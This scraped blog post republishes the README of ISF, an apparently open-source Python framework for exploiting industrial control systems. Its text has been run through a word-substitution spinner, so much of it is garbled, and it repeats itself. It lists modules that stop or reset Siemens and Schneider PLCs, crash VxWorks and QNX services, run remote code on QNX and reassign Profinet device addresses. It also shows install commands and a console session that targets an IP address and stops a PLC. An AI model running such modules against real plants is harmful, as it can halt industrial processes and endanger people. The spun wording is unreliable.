Isf - Industrial Command Arrangement Exploitation Framework
Wednesday, September 11, 2019
Edit
Isf - Industrial Command Arrangement Exploitation Framework - Hi friends mederc, In the article that you read this time with the title Isf - Industrial Command Arrangement Exploitation Framework, We have prepared this article well for you to read and retrieve information from it. hopefully fill the posts
Article Bruteforce,
Article Exploitation,
Article Exploitation Framework,
Article Exploits,
Article Framework,
Article Fuzzing Framework,
Article ICS,
Article ISF,
Article Metasploit,
Article Modbus,
Article Python,
Article RouterSploit,
Article Scanner,
Article Scapy,
Article System, we write this you can understand. Alright, happy reading.
Title : Isf - Industrial Command Arrangement Exploitation Framework
link : Isf - Industrial Command Arrangement Exploitation Framework
ISF(Industrial Exploitation Framework) is a exploitation framework based on Python, it's similar to metasploit framework.
ISF is based on opened upwards source projection routersploit.
Read this inward other languages: English, 简体中文,
ICS Protocol Clients
Exploit Module
Scanner Module
ICS Protocols Module (Scapy Module)
These protocol tin used inward other Fuzzing framework similar Kitty or exercise your ain client.
Install
Python requirements
Install on Kali
Usage
Exploits
Options
Display module options:
Set options
Run module
Display information almost exploit
Documents
You are now reading the article Isf - Industrial Command Arrangement Exploitation Framework with the link address https://mederc.blogspot.com/2019/09/isf-industrial-command-arrangement.html
Title : Isf - Industrial Command Arrangement Exploitation Framework
Isf - Industrial Command Arrangement Exploitation Framework
ISF(Industrial Exploitation Framework) is a exploitation framework based on Python, it's similar to metasploit framework.
ISF is based on opened upwards source projection routersploit.
Read this inward other languages: English, 简体中文,
Name | Path | Description |
---|---|---|
modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | Modbus-TCP Client |
wdb2_client | icssploit/clients/wdb2_client.py | WdbRPC Version two Client(Vxworks 6.x) |
s7_client | icssploit/clients/s7_client.py | s7comm Client(S7 300/400 PLC) |
Exploit Module
Name | Path | Description |
---|---|---|
s7_300_400_plc_control | exploits/plcs/siemens/s7_300_400_plc_control.py | S7-300/400 PLC start/stop |
s7_1200_plc_control | exploits/plcs/siemens/s7_1200_plc_control.py | S7-1200 PLC start/stop/reset |
vxworks_rpc_dos | exploits/plcs/vxworks/vxworks_rpc_dos.py | Vxworks RPC remote dos(CVE-2015-7599) |
quantum_140_plc_control | exploits/plcs/schneider/quantum_140_plc_control.py | Schneider Quantum 140 serial PLC start/stop |
crash_qnx_inetd_tcp_service | exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py | QNX Inetd TCP service dos |
qconn_remote_exec | exploits/plcs/qnx/qconn_remote_exec.py | QNX qconn remote code execution |
profinet_set_ip | exploits/plcs/siemens/profinet_set_ip.py | Profinet DCP device IP config |
Scanner Module
Name | Path | Description |
---|---|---|
profinet_dcp_scan | scanners/profinet_dcp_scan.py | Profinet DCP scanner |
vxworks_6_scan | scanners/vxworks_6_scan.py | Vxworks 6.x scanner |
s7comm_scan | scanners/s7comm_scan.py | S7comm scanner |
enip_scan | scanners/enip_scan.py | EthernetIP scanner |
ICS Protocols Module (Scapy Module)
These protocol tin used inward other Fuzzing framework similar Kitty or exercise your ain client.
Name | Path | Description |
---|---|---|
pn_dcp | icssploit/protocols/pn_dcp | Profinet DCP Protocol |
modbus_tcp | icssploit/protocols/modbus_tcp | Modbus TCP Protocol |
wdbrpc2 | icssploit/protocols/wdbrpc2 | WDB RPC Version two Protocol |
s7comm | icssploit/protocols/s7comm.py | S7comm Protocol |
Install
Python requirements
- gnureadline (OSX only)
- requests
- paramiko
- beautifulsoup4
- pysnmp
- python-nmap
- scapy We propose install scapy manual alongside this official document
Install on Kali
git clone https://github.com/dark-lbp/isf/ cd isf python isf.py
Usage
root@kali: /Desktop/temp/isf# python isf.py _____ _____ _____ _____ _____ _ ____ _____ _______ |_ _/ ____|/ ____/ ____| __ \| | / __ \_ _|__ __| | || | | (___| (___ | |__) | | | | | || | | | | || | \___ \\___ \| ___/| | | | | || | | | _| || |____ ____) |___) | | | |___| |__| || |_ | | |_____\_____|_____/_____/|_| |______\____/_____| |_| ICS Exploitation Framework Note : ICSSPOLIT is fork from routersploit at https://github.com/reverse-shell/routersploit Dev Team : wenzhe zhu(dark-lbp) Version : 0.1.0 Exploits: two Scanners: 0 Creds: xiii ICS Exploits: PLC: two ICS Switch: 0 Software: 0 isf >
Exploits
isf > purpose exploits/plcs/ exploits/plcs/siemens/ exploits/plcs/vxworks/ isf > purpose exploits/plcs/siemens/s7_300_400_plc_control exploits/plcs/siemens/s7_300_400_plc_control isf > purpose exploits/plcs/siemens/s7_300_400_plc_control isf (S7-300/400 PLC Control) >
You tin purpose the tab telephone commutation for completion.Options
Display module options:
isf (S7-300/400 PLC Control) > demonstrate options Target options: Name Current settings Description ---- ---------------- ----------- target Target address e.g. 192.168.1.1 port 102 Target Port Module options: Name Current settings Description ---- ---------------- ----------- slot two CPU slot number. command 1 Command 0:start plc, 1:stop plc. isf (S7-300/400 PLC Control) >
Set options
isf (S7-300/400 PLC Control) > develop target 192.168.70.210 [+] {'target': '192.168.70.210'}
Run module
isf (S7-300/400 PLC Control) > run [*] Running module... [+] Target is live on [*] Sending parcel to target [*] Stop plc isf (S7-300/400 PLC Control) >
Display information almost exploit
isf (S7-300/400 PLC Control) > demonstrate information Name: S7-300/400 PLC Control Description: Use S7comm command to start/stop plc. Devices: - Siemens S7-300 together with S7-400 programmable logic controllers (PLCs) Authors: - wenzhe zhu <jtrkid[at]gmail.com> References: isf (S7-300/400 PLC Control) >
Documents
- Modbus-TCP Client usage
- WDBRPCV2 Client usage
- S7comm Client usage
- SNMP_bruteforce usage
- S7 300/400 PLC password bruteforce usage
- Vxworks 6.x Scanner usage
- Profient DCP Scanner usage
- S7comm PLC Scanner usage
- Profinet DCP Set ip module usage
- Load modules from extra folder
- How to write your ain module
Thus the article Isf - Industrial Command Arrangement Exploitation Framework
That's all the article Isf - Industrial Command Arrangement Exploitation Framework this time, hopefully can benefit you all. okay, see you in another article posting.
You are now reading the article Isf - Industrial Command Arrangement Exploitation Framework with the link address https://mederc.blogspot.com/2019/09/isf-industrial-command-arrangement.html